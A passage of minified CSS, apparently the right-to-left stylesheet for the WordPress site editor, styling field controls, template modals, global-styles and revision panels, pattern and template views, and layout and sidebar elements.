input.components-input-control__input{padding-inline-start:0!important}.fields-controls__slug .fields-controls__slug-help-link{word-break:break-word}.fields-controls__slug .fields-controls__slug-help{display:flex;flex-direction:column}.fields-controls__slug .fields-controls__slug-help .fields-controls__slug-help-slug{font-weight:600}.fields-controls__featured-image-placeholder{background:#fff linear-gradient(45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0);border-radius:2px;box-shadow:inset 0 0 0 1px #0003;display:inline-block;padding:0}.fields-controls__featured-image-title{color:#1e1e1e;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:100%}.fields-controls__featured-image-image{align-self:center;border-radius:2px;height:100%;width:100%}.fields-controls__featured-image-container .fields-controls__featured-image-placeholder{margin:0}.fields-controls__featured-image-container span{margin-left:auto}fieldset.fields-controls__featured-image{border:0;margin:0;padding:0}fieldset.fields-controls__featured-image .fields-controls__featured-image-container{border:1px solid #ddd;border-radius:2px;cursor:pointer;padding:8px 12px}fieldset.fields-controls__featured-image .fields-controls__featured-image-container:hover{background-color:#f0f0f0}fieldset.fields-controls__featured-image .fields-controls__featured-image-placeholder{height:24px;width:24px}fieldset.fields-controls__featured-image span{align-self:center;text-align:start;white-space:nowrap}fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button{height:fit-content;padding:0}fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button:focus,fieldset.fields-controls__featured-image .fields-controls__featured-image-upload-button:hover{border:0;color:unset}fieldset.fields-controls__featured-image .fields-controls__featured-image-remove-button{place-self:end}.dataforms-layouts-panel__field-control .fields-controls__featured-image-image,.dataforms-layouts-panel__field-control .fields-controls__featured-image-placeholder{height:16px;width:16px}.dataviews-view-grid__media .fields-controls__featured-image-image,.dataviews-view-grid__media .fields-controls__featured-image-placeholder,.dataviews-view-list__media-wrapper .fields-controls__featured-image-image,.dataviews-view-list__media-wrapper .fields-controls__featured-image-placeholder,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-image,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{border-radius:4px;display:block;height:100%;width:100%}.dataviews-view-grid__media .fields-controls__featured-image-placeholder,.dataviews-view-list__media-wrapper .fields-controls__featured-image-placeholder,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{background:#f0f0f0;box-shadow:none}.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-image,.dataviews-view-table__cell-content-wrapper.dataviews-column-primary__media .fields-controls__featured-image-placeholder{height:32px;width:32px}.fields-controls__parent,.fields-controls__password,.fields-controls__template{border:0;margin:0;padding:0}.fields-controls__template-modal{z-index:1000001}.fields-controls__template-content .block-editor-block-patterns-list{column-count:2;column-gap:24px;padding-top:2px}@media (min-width:782px){.fields-controls__template-content .block-editor-block-patterns-list{column-count:3}}@media (min-width:1280px){.fields-controls__template-content .block-editor-block-patterns-list{column-count:4}}.fields-controls__template-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.fields-field__title>span:first-child{display:block;flex-grow:0;overflow:hidden;text-decoration:none;text-overflow:ellipsis;white-space:nowrap}.fields-field__pattern-title span:first-child{flex:1}.edit-site-custom-template-modal__contents-wrapper{height:100%;justify-content:flex-start!important}.edit-site-custom-template-modal__contents-wrapper>*{width:100%}.edit-site-custom-template-modal__contents-wrapper__suggestions_list{margin-left:-12px;margin-right:-12px;width:calc(100% + 24px)}.edit-site-custom-template-modal__contents>.components-button{height:auto;justify-content:center}@media (min-width:782px){.edit-site-custom-template-modal{width:456px}}@media (min-width:600px){.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list{max-height:224px;overflow-y:auto}}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item{display:block;height:auto;overflow-wrap:break-word;padding:8px 12px;text-align:right;white-space:pre-wrap;width:100%}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item mark{background:none;font-weight:700}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04)}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover *,.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:hover mark{color:var(--wp-admin-theme-color)}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:focus{background-color:#f0f0f0}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item:focus:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color) inset}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__info,.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__title{display:block;overflow:hidden;text-overflow:ellipsis}.edit-site-custom-template-modal .edit-site-custom-template-modal__suggestions_list__list-item__info{color:#757575;word-break:break-all}.edit-site-custom-template-modal__no-results{border:1px solid #ccc;border-radius:2px;padding:16px}.edit-site-custom-generic-template__modal .components-modal__header{border-bottom:none}.edit-site-custom-generic-template__modal .components-modal__content:before{margin-bottom:4px}@media (min-width:960px){.edit-site-add-new-template__modal{margin-top:64px;max-height:calc(100% - 128px);max-width:832px;width:calc(100% - 128px)}}.edit-site-add-new-template__modal .edit-site-add-new-template__custom-template-button svg,.edit-site-add-new-template__modal .edit-site-add-new-template__template-button svg{fill:var(--wp-admin-theme-color)}.edit-site-add-new-template__modal .edit-site-add-new-template__custom-template-button .edit-site-add-new-template__template-name{align-items:flex-start;flex-grow:1}.edit-site-add-new-template__modal .edit-site-add-new-template__template-icon{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-radius:100%;max-height:40px;max-width:40px;padding:8px}.edit-site-add-new-template__template-list__contents>.components-button,.edit-site-custom-template-modal__contents>.components-button{border:1px solid #ddd;display:flex;flex-direction:column;justify-content:center;outline:1px solid #0000;padding:32px}.edit-site-add-new-template__template-list__contents>.components-button span:first-child,.edit-site-custom-template-modal__contents>.components-button span:first-child{color:#1e1e1e}.edit-site-add-new-template__template-list__contents>.components-button span,.edit-site-custom-template-modal__contents>.components-button span{color:#757575}.edit-site-add-new-template__template-list__contents>.components-button:hover,.edit-site-custom-template-modal__contents>.components-button:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:#0000;color:var(--wp-admin-theme-color-darker-10)}.edit-site-add-new-template__template-list__contents>.components-button:hover span,.edit-site-custom-template-modal__contents>.components-button:hover span{color:var(--wp-admin-theme-color)}.edit-site-add-new-template__template-list__contents>.components-button:focus,.edit-site-custom-template-modal__contents>.components-button:focus{border-color:#0000;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:3px solid #0000}.edit-site-add-new-template__template-list__contents>.components-button:focus span:first-child,.edit-site-custom-template-modal__contents>.components-button:focus span:first-child{color:var(--wp-admin-theme-color)}.edit-site-add-new-template__template-list__contents .edit-site-add-new-template__custom-template-button,.edit-site-add-new-template__template-list__contents .edit-site-add-new-template__template-list__prompt,.edit-site-custom-template-modal__contents .edit-site-add-new-template__custom-template-button,.edit-site-custom-template-modal__contents .edit-site-add-new-template__template-list__prompt{grid-column:1/-1}.edit-site-add-new-template__template-list__contents>.components-button{align-items:flex-start;height:100%;text-align:start}.edit-site-visual-editor__editor-canvas.is-focused{outline:calc(var(--wp-admin-border-width-focus)*2) solid var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-2)}.edit-site-canvas-loader{align-items:center;display:flex;height:100%;justify-content:center;opacity:0;position:absolute;right:0;top:0;width:100%}@media not (prefers-reduced-motion){.edit-site-canvas-loader{animation:edit-site-canvas-loader__fade-in-animation .5s ease .2s;animation-fill-mode:forwards}}.edit-site-canvas-loader>div{width:160px}@keyframes edit-site-canvas-loader__fade-in-animation{0%{opacity:0}to{opacity:1}}.edit-site-global-styles-preview{align-items:center;cursor:pointer;display:flex;justify-content:center;line-height:1}.edit-site-global-styles-preview__wrapper{display:block;max-width:100%;width:100%}.edit-site-typography-preview{align-items:center;background:#f0f0f0;border-radius:2px;display:flex;justify-content:center;margin-bottom:16px;min-height:100px;overflow:hidden}.edit-site-font-size__item{line-break:anywhere;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.edit-site-font-size__item-value{color:#757575}.edit-site-global-styles-screen{margin:12px 16px 16px}.edit-site-global-styles-screen-typography__indicator{align-items:center;border-radius:1px;display:flex!important;font-size:14px;height:24px;justify-content:center;width:24px}.edit-site-global-styles-screen-typography__font-variants-count{color:#757575}.edit-site-global-styles-font-families__manage-fonts{justify-content:center}.edit-site-global-styles-screen .color-block-support-panel{border-top:none;padding-left:0;padding-right:0;padding-top:0;row-gap:12px}.edit-site-global-styles-header__description{padding:0 16px}.edit-site-block-types-search{margin-bottom:8px;padding:0 16px}.edit-site-global-styles-header{margin-bottom:0!important}.edit-site-global-styles-subtitle{font-size:11px!important;font-weight:500!important;margin-bottom:0!important;text-transform:uppercase}.edit-site-global-styles-section-title{color:#2f2f2f;font-weight:600;line-height:1.2;margin:0;padding:16px 16px 0}.edit-site-global-styles-icon-with-current-color{fill:currentColor}.edit-site-global-styles__color-indicator-wrapper{flex-shrink:0;height:24px}.edit-site-global-styles__shadows-panel__options-container,.edit-site-global-styles__typography-panel__options-container{height:24px}.edit-site-global-styles__block-preview-panel{border:1px solid #e0e0e0;border-radius:4px;overflow:hidden;position:relative;width:100%}.edit-site-global-styles__shadow-preview-panel{background-image:repeating-linear-gradient(-45deg,#f5f5f5 25%,#0000 0,#0000 75%,#f5f5f5 0,#f5f5f5),repeating-linear-gradient(-45deg,#f5f5f5 25%,#0000 0,#0000 75%,#f5f5f5 0,#f5f5f5);background-position:100% 0,right 8px top 8px;background-size:16px 16px;border:1px solid #e0e0e0;border-radius:4px;height:144px;overflow:auto}.edit-site-global-styles__shadow-preview-panel .edit-site-global-styles__shadow-preview-block{background-color:#fff;border:1px solid #e0e0e0;border-radius:2px;height:60px;width:60%}.edit-site-global-styles__shadow-editor__dropdown-content{width:280px}.edit-site-global-styles__shadow-editor-panel{margin-bottom:4px}.edit-site-global-styles__shadow-editor__dropdown{position:relative;width:100%}.edit-site-global-styles__shadow-editor__dropdown-toggle{border-radius:inherit;height:auto;padding-bottom:8px;padding-top:8px;text-align:right;width:100%}.edit-site-global-styles__shadow-editor__dropdown-toggle.is-open{background:#f0f0f0;color:var(--wp-admin-theme-color)}.edit-site-global-styles__shadow-editor__remove-button{left:8px;opacity:0;position:absolute;top:8px}.edit-site-global-styles__shadow-editor__remove-button.edit-site-global-styles__shadow-editor__remove-button{border:none}.edit-site-global-styles__shadow-editor__dropdown-toggle:hover+.edit-site-global-styles__shadow-editor__remove-button,.edit-site-global-styles__shadow-editor__remove-button:focus,.edit-site-global-styles__shadow-editor__remove-button:hover{opacity:1}@media (hover:none){.edit-site-global-styles__shadow-editor__remove-button{opacity:1}}.edit-site-global-styles-screen-css{display:flex;flex:1 1 auto;flex-direction:column;margin:16px}.edit-site-global-styles-screen-css .components-v-stack{flex:1 1 auto}.edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input,.edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input .components-base-control__field{display:flex;flex:1 1 auto;flex-direction:column}.edit-site-global-styles-screen-css .components-v-stack .block-editor-global-styles-advanced-panel__custom-css-input .components-base-control__field .components-textarea-control__input{direction:ltr;flex:1 1 auto}.edit-site-global-styles-screen-css-help-link{display:inline-block;margin-top:8px}.edit-site-global-styles-screen-variations{border-top:1px solid #ddd;margin-top:16px}.edit-site-global-styles-screen-variations>*{margin:24px 16px}.edit-site-global-styles-sidebar__navigator-provider{height:100%}.edit-site-global-styles-sidebar__navigator-screen{display:flex;flex-direction:column;height:100%}.edit-site-global-styles-sidebar__navigator-screen .single-column{grid-column:span 1}.edit-site-global-styles-screen-root.edit-site-global-styles-screen-root,.edit-site-global-styles-screen-style-variations.edit-site-global-styles-screen-style-variations{background:unset;color:inherit}.edit-site-global-styles-sidebar__panel .block-editor-block-icon svg{fill:currentColor}.edit-site-global-styles-screen-root__active-style-tile.edit-site-global-styles-screen-root__active-style-tile,.edit-site-global-styles-screen-root__active-style-tile.edit-site-global-styles-screen-root__active-style-tile .edit-site-global-styles-screen-root__active-style-tile-preview{border-radius:2px}.edit-site-global-styles-screen-revisions__revisions-list{flex-grow:1;list-style:none;margin:0 16px 16px}.edit-site-global-styles-screen-revisions__revisions-list li{margin-bottom:0}.edit-site-global-styles-screen-revisions__revision-item{cursor:pointer;display:flex;flex-direction:column;position:relative}.edit-site-global-styles-screen-revisions__revision-item[role=option]:active,.edit-site-global-styles-screen-revisions__revision-item[role=option]:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.edit-site-global-styles-screen-revisions__revision-item:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04)}.edit-site-global-styles-screen-revisions__revision-item:hover .edit-site-global-styles-screen-revisions__date{color:var(--wp-admin-theme-color)}.edit-site-global-styles-screen-revisions__revision-item:after,.edit-site-global-styles-screen-revisions__revision-item:before{content:"\a";display:block;position:absolute}.edit-site-global-styles-screen-revisions__revision-item:before{background:#ddd;border:4px solid #0000;border-radius:50%;height:8px;right:17px;top:18px;transform:translate(50%,-50%);width:8px;z-index:1}.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true]{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-radius:2px;color:var(--wp-admin-theme-color);outline:3px solid #0000;outline-offset:-2px}.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__date{color:var(--wp-admin-theme-color)}.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true]:before{background:var(--wp-admin-theme-color)}.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__changes>li,.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__meta{color:#1e1e1e}.edit-site-global-styles-screen-revisions__revision-item:after{border:.5px solid #ddd;height:100%;right:16px;top:0;width:0}.edit-site-global-styles-screen-revisions__revision-item:first-child:after{top:18px}.edit-site-global-styles-screen-revisions__revision-item:last-child:after{height:18px}.edit-site-global-styles-screen-revisions__revision-item-wrapper{display:block;padding:12px 40px 4px 12px}.edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__apply-button.is-primary{align-self:flex-start;margin:4px 40px 12px 12px}.edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__changes,.edit-site-global-styles-screen-revisions__meta{color:#757575;font-size:12px}.edit-site-global-styles-screen-revisions__description{align-items:flex-start;display:flex;flex-direction:column;gap:8px}.edit-site-global-styles-screen-revisions__description .edit-site-global-styles-screen-revisions__date{font-size:12px;font-weight:600;text-transform:uppercase}.edit-site-global-styles-screen-revisions__meta{align-items:flex-start;display:flex;justify-content:start;margin-bottom:4px;text-align:right;width:100%}.edit-site-global-styles-screen-revisions__meta img{border-radius:100%;height:16px;margin-left:8px;width:16px}.edit-site-global-styles-screen-revisions__loading{margin:24px auto!important}.edit-site-global-styles-screen-revisions__changes{line-height:1.4;list-style:disc;margin-right:12px;text-align:right}.edit-site-global-styles-screen-revisions__changes li{margin-bottom:4px}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination{gap:2px;justify-content:space-between}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .edit-site-pagination__total{height:1px;margin:-1px;overflow:hidden;position:absolute;right:-1000px}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-text{font-size:12px;will-change:opacity}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary{color:#1e1e1e}.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary:disabled,.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary[aria-disabled=true]{color:#949494}.edit-site-global-styles-screen-revisions__footer{background:#fff;border-top:1px solid #ddd;bottom:0;height:56px;min-width:100%;padding:12px;position:sticky;z-index:1}.edit-site-global-styles-sidebar{display:flex;flex-direction:column;min-height:100%}.edit-site-global-styles-sidebar__panel{flex:1}.edit-site-global-styles-sidebar .edit-site-global-styles-sidebar__header-title{margin:0}.edit-site-global-styles-sidebar .edit-site-global-styles-sidebar__header-actions{flex:1}.edit-site-global-styles-sidebar .components-navigation__menu-title-heading{font-size:15.6px;font-weight:500}.edit-site-global-styles-sidebar .components-navigation__item>button span{font-weight:500}.edit-site-global-styles-sidebar .block-editor-panel-color-gradient-settings{border:0}.edit-site-global-styles-sidebar .single-column{grid-column:span 1}.edit-site-global-styles-sidebar .components-tools-panel .span-columns{grid-column:1/-1}.edit-site-global-styles-sidebar__blocks-group{border-top:1px solid #e0e0e0;padding-top:24px}.edit-site-global-styles-sidebar__blocks-group-help{padding:0 16px}.edit-site-global-styles-color-palette-panel,.edit-site-global-styles-gradient-palette-panel{padding:16px}.edit-site-global-styles-sidebar hr{margin:0}.show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon{width:auto}.show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon svg{display:none}.show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.edit-site-patterns__delete-modal{width:384px}.page-patterns-preview-field{align-items:center;border-radius:4px;display:flex;flex-direction:column;height:100%;justify-content:center}.dataviews-view-grid .page-patterns-preview-field .block-editor-block-preview__container{height:100%}.dataviews-view-table .page-patterns-preview-field{flex-grow:0;text-wrap:balance;text-wrap:pretty;width:96px}.edit-site-patterns__pattern-icon{fill:var(--wp-block-synced-color);flex-shrink:0}.edit-site-patterns__section-header{border-bottom:1px solid #f0f0f0;flex-shrink:0;min-height:40px;padding:16px 48px;position:sticky;top:0;z-index:2}@media not (prefers-reduced-motion){.edit-site-patterns__section-header{transition:padding .1s ease-out}}.edit-site-patterns__section-header .edit-site-patterns__title{min-height:40px}.edit-site-patterns__section-header .edit-site-patterns__title .components-heading{flex-basis:0;flex-grow:1;white-space:nowrap}.edit-site-patterns__section-header .edit-site-patterns__sub-title{margin-bottom:8px}.edit-site-patterns__section-header .screen-reader-shortcut:focus{top:0}.edit-site-page-patterns-dataviews .dataviews-view-grid__badge-fields .dataviews-view-grid__field-value:has(.edit-site-patterns__field-sync-status-fully){background:rgba(var(--wp-block-synced-color--rgb),.04);color:var(--wp-block-synced-color)}.dataviews-action-modal__duplicate-pattern [role=dialog]>[role=document]{width:350px}.dataviews-action-modal__duplicate-pattern .patterns-menu-items__convert-modal-categories{position:relative}.dataviews-action-modal__duplicate-pattern .components-form-token-field__suggestions-list:not(:empty){background-color:#fff;border:1px solid var(--wp-admin-theme-color);border-bottom-left-radius:2px;border-bottom-right-radius:2px;box-shadow:0 0 .5px .5px var(--wp-admin-theme-color);box-sizing:border-box;max-height:96px;min-width:auto;position:absolute;right:-1px;width:calc(100% + 2px);z-index:1}@media (min-width:600px){.dataviews-action-modal__duplicate-template-part .components-modal__frame{max-width:500px}}@container (max-width: 430px){.edit-site-page-patterns-dataviews .edit-site-patterns__section-header{padding-left:24px;padding-right:24px}}.page-templates-preview-field{align-items:center;border-radius:4px;display:flex;flex-direction:column;height:100%;justify-content:center;width:100%}.dataviews-view-list .page-templates-preview-field .block-editor-block-preview__container{height:120px}.dataviews-view-grid .page-templates-preview-field .block-editor-block-preview__container{height:100%}.dataviews-view-table .page-templates-preview-field{max-height:160px;position:relative;text-wrap:balance;text-wrap:pretty;width:120px}.edit-site-page-templates .dataviews-pagination{z-index:2}.page-templates-author-field__avatar{align-items:center;display:flex;flex-shrink:0;height:24px;justify-content:right;overflow:hidden;width:24px}.page-templates-author-field__avatar img{border-radius:100%;height:16px;object-fit:cover;opacity:0;width:16px}@media not (prefers-reduced-motion){.page-templates-author-field__avatar img{transition:opacity .1s linear}}.page-templates-author-field__avatar.is-loaded img{opacity:1}.page-templates-author-field__icon{display:flex;flex-shrink:0;height:24px;width:24px}.page-templates-author-field__icon svg{margin-right:-4px;fill:currentColor}.page-templates-author-field__name{overflow:hidden;text-overflow:ellipsis}.edit-site-list__rename-modal{z-index:1000001}@media (min-width:782px){.edit-site-list__rename-modal .components-base-control{width:320px}}.edit-site-editor__editor-interface{opacity:1}@media not (prefers-reduced-motion){.edit-site-editor__editor-interface{transition:opacity .1s ease-out}}.edit-site-editor__editor-interface.is-loading{opacity:0}.edit-site-editor__toggle-save-panel{background-color:#fff;border:1px dotted #ddd;box-sizing:border-box;display:flex;justify-content:center;padding:24px;width:280px}.edit-site-editor__view-mode-toggle{view-transition-name:toggle;height:64px;right:0;top:0;width:64px;z-index:100}.edit-site-editor__view-mode-toggle .components-button{align-items:center;border-radius:0;color:#fff;display:flex;height:100%;justify-content:center;overflow:hidden;padding:0;width:100%}.edit-site-editor__view-mode-toggle .components-button:active,.edit-site-editor__view-mode-toggle .components-button:hover{color:#fff}.edit-site-editor__view-mode-toggle .components-button:focus{box-shadow:none}.edit-site-editor__view-mode-toggle .edit-site-editor__view-mode-toggle-icon img,.edit-site-editor__view-mode-toggle .edit-site-editor__view-mode-toggle-icon svg{background:#1e1e1e;display:block}.edit-site-editor__back-icon{align-items:center;background-color:#ccc;display:flex;height:64px;justify-content:center;pointer-events:none;position:absolute;right:0;top:0;width:64px}.edit-site-editor__back-icon svg{fill:currentColor}.edit-site-editor__back-icon.has-site-icon{backdrop-filter:saturate(180%) blur(15px);background-color:#fff9}.edit-site-welcome-guide{width:312px}.edit-site-welcome-guide.guide-editor .edit-site-welcome-guide__image,.edit-site-welcome-guide.guide-styles .edit-site-welcome-guide__image{background:#00a0d2}.edit-site-welcome-guide.guide-page .edit-site-welcome-guide__video{border-left:16px solid #3858e9;border-top:16px solid #3858e9}.edit-site-welcome-guide.guide-template .edit-site-welcome-guide__video{border-right:16px solid #3858e9;border-top:16px solid #3858e9}.edit-site-welcome-guide__image{margin:0 0 16px}.edit-site-welcome-guide__image>img{display:block;max-width:100%;object-fit:cover}.edit-site-welcome-guide__heading{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:24px;line-height:1.4;margin:16px 0;padding:0 32px}.edit-site-welcome-guide__text{font-size:13px;line-height:1.4;margin:0 0 16px;padding:0 32px}.edit-site-welcome-guide__text img{vertical-align:bottom}.edit-site-welcome-guide__inserter-icon{margin:0 4px;vertical-align:text-top}.edit-site-layout{color:#ccc;display:flex;flex-direction:column;height:100%}.edit-site-layout,.edit-site-layout:not(.is-full-canvas) .editor-visual-editor{background:#1e1e1e}.edit-site-layout__content{display:flex;flex-grow:1;height:100%}.edit-site-layout__sidebar-region{flex-shrink:0;width:100vw;z-index:1}@media (min-width:782px){.edit-site-layout__sidebar-region{width:300px}}.edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region{height:100vh;position:fixed!important;right:0;top:0}.edit-site-layout__sidebar-region .edit-site-layout__sidebar{display:flex;flex-direction:column;height:100%}.edit-site-layout__sidebar-region .resizable-editor__drag-handle{left:0}.edit-site-layout__main{display:flex;flex-direction:column;flex-grow:1;overflow:hidden}.edit-site-layout__mobile{display:flex;flex-direction:column;position:relative;width:100%;z-index:2}.edit-site-layout__mobile .edit-site-sidebar__screen-wrapper{padding:0}.edit-site-layout__mobile .edit-site-sidebar-navigation-screen__main{padding:0 12px}.edit-site-layout__canvas-container{flex-grow:1;overflow:visible;position:relative;z-index:2}.edit-site-layout__canvas-container.is-resizing:after{bottom:0;content:"";left:0;position:absolute;right:0;top:0;z-index:100}.edit-site-layout__canvas{align-items:center;bottom:0;display:flex;justify-content:center;position:absolute;right:0;top:0;width:100%}.edit-site-layout__canvas.is-right-aligned{justify-content:flex-end}.edit-site-layout__canvas .edit-site-resizable-frame__inner{color:#1e1e1e}@media (min-width:782px){.edit-site-layout__canvas{bottom:16px;top:16px;width:calc(100% - 16px)}.edit-site-layout__canvas .edit-site-resizable-frame__inner-content{box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;overflow:hidden}}@media (min-width:782px) and (not (prefers-reduced-motion)){.edit-site-layout__canvas .edit-site-resizable-frame__inner-content{transition:border-radius,box-shadow .4s}}@media (min-width:782px){.edit-site-layout:not(.is-full-canvas) .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{border-radius:8px}.edit-site-layout__canvas .edit-site-resizable-frame__inner-content:hover{box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005}}.edit-site-layout.is-full-canvas .edit-site-layout__canvas{bottom:0;top:0;width:100%}.edit-site-layout__canvas .interface-interface-skeleton,.edit-site-layout__mobile .interface-interface-skeleton,.edit-site-template-pages-preview .interface-interface-skeleton{min-height:100%!important;position:relative!important}.edit-site-template-pages-preview{height:100%}html.canvas-mode-edit-transition::view-transition-group(toggle){animation-delay:255ms}@media (prefers-reduced-motion){::view-transition-group(*),::view-transition-new(*),::view-transition-old(*){animation:none!important}}.edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region .edit-site-layout__view-mode-toggle{display:none}.edit-site-layout__view-mode-toggle.components-button{view-transition-name:toggle;align-items:center;background:#1e1e1e;border-radius:0;color:#fff;display:flex;height:64px;justify-content:center;overflow:hidden;padding:0;position:relative;width:64px}.edit-site-layout__view-mode-toggle.components-button:active,.edit-site-layout__view-mode-toggle.components-button:hover{color:#fff}.edit-site-layout__view-mode-toggle.components-button:focus,.edit-site-layout__view-mode-toggle.components-button:focus-visible{box-shadow:0 0 0 3px #1e1e1e,0 0 0 6px var(--wp-admin-theme-color);outline:4px solid #0000;outline-offset:4px}.edit-site-layout__view-mode-toggle.components-button:before{border-radius:4px;bottom:9px;box-shadow:none;content:"";display:block;left:9px;position:absolute;right:17px;top:9px}@media not (prefers-reduced-motion){.edit-site-layout__view-mode-toggle.components-button:before{transition:box-shadow .1s ease}}.edit-site-layout__view-mode-toggle.components-button .edit-site-layout__view-mode-toggle-icon{align-items:center;display:flex;height:64px;justify-content:center;width:64px}.edit-site-layout__actions{background:#fff;bottom:auto;color:#1e1e1e;left:0;position:fixed!important;right:auto;top:-9999em;width:280px;z-index:100000}.edit-site-layout__actions:focus,.edit-site-layout__actions:focus-within{bottom:0;top:auto}.edit-site-layout__actions.is-entity-save-view-open:focus,.edit-site-layout__actions.is-entity-save-view-open:focus-within{top:0}@media (min-width:782px){.edit-site-layout__actions{border-right:1px solid #ddd}}.edit-site-layout__area{box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;flex-grow:1;margin:0;overflow:hidden}@media (min-width:782px){.edit-site-layout__area{border-radius:8px;margin:16px 0 16px 16px}}.edit-site .components-editor-notices__snackbar{bottom:16px;left:0;padding-left:16px;padding-right:16px;position:fixed}.edit-site-save-hub{border-top:1px solid #2f2f2f;color:#949494;flex-shrink:0;margin:0;padding:16px}.edit-site-save-hub__button{color:inherit;justify-content:center;width:100%}.edit-site-save-hub__button[aria-disabled=true]{opacity:1}.edit-site-save-hub__button[aria-disabled=true]:hover{color:inherit}.edit-site-save-hub__button:not(.is-primary).is-busy,.edit-site-save-hub__button:not(.is-primary).is-busy[aria-disabled=true]:hover{color:#1e1e1e}@media (min-width:600px){.edit-site-save-panel__modal{width:600px}}.edit-site-sidebar__content{contain:content;flex-grow:1;overflow-x:hidden;overflow-y:auto}@keyframes local--slide-from-right{0%{opacity:0;transform:translateX(-50px)}to{opacity:1;transform:none}}@keyframes local--slide-from-left{0%{opacity:0;transform:translateX(50px)}to{opacity:1;transform:none}}.edit-site-sidebar__screen-wrapper{overflow-x:auto}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar{height:12px;width:12px}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar-track{background-color:initial}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.edit-site-sidebar__screen-wrapper:focus-within::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:focus::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:hover::-webkit-scrollbar-thumb{background-color:#757575}.edit-site-sidebar__screen-wrapper{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.edit-site-sidebar__screen-wrapper:focus,.edit-site-sidebar__screen-wrapper:focus-within,.edit-site-sidebar__screen-wrapper:hover{scrollbar-color:#757575 #0000}.edit-site-sidebar__screen-wrapper{will-change:transform}@media (hover:none){.edit-site-sidebar__screen-wrapper{scrollbar-color:#757575 #0000}}.edit-site-sidebar__screen-wrapper{animation-duration:.14s;animation-timing-function:ease-in-out;display:flex;flex-direction:column;height:100%;max-height:100%;padding:0 12px;scrollbar-gutter:stable;will-change:transform,opacity}@media 